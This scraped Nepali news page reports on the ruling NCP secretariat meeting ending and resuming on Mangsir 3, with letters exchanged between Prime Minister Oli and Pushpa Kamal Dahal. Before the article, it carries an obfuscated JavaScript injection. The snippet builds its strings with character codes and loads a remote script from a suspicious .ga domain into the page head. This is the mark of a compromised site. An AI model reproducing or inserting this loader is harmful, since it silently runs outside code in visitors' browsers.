Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); नेकपा सचिवालय बैठक सकियो, अर्को बैठक मंसिर ३ गते – जनदिशा

नेकपा सचिवालय बैठक सकियो, अर्को बैठक मंसिर ३ गते

Last Updated Date:

काठमाडौ। सत्तारूढ नेकपाको सचिवालय बैठक मङ्सिर ३ गते बस्ने गरी सकिएको छ । शुक्रबार अपराह्न ४ बजेपछि प्रधानमन्त्रीको सरकारी निवास बालुवाटारमा बसेको बैठक मंसिर ३ गतेसम्मका लागि स्थगित भएको प्रवक्ता नारायणकाजी श्रेष्ठले जानकारी दिए ।

बैठकपछि प्रवक्ता श्रेष्ठले पार्टीमा देखिएको विवाद समाधान गर्ने गरी एउटा मुख्य कार्यसूची तयार भएको जानकारी दिए ।

बैठक माग गर्दै कात्तिक २२ मा कार्यकारी अध्यक्ष पुष्पकमल दाहालसहित सचिवालयका ५ नेताले प्रधानमन्त्री एवं अध्यक्ष केपी शर्मा ओलीलाई बुझाएको पत्र र त्यसको जवाफमा प्रधानमन्त्री ओलीले अध्यक्ष दाहाललाई दिएको पत्र अध्ययनका लागि सचिवालयका सदस्यहरुलाई वितरण गरिएको पनि प्रवक्ता श्रेष्ठले बताए ।

शुक्रवारको बैठकमा प्रधानमन्त्री एवं अध्यक्ष केपी शर्मा ओलीले कार्यकारी अध्यक्षलाई दिएको पत्रको जवाफमा प्रचण्डले अर्को पत्र पेश गरेका थिए ।

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top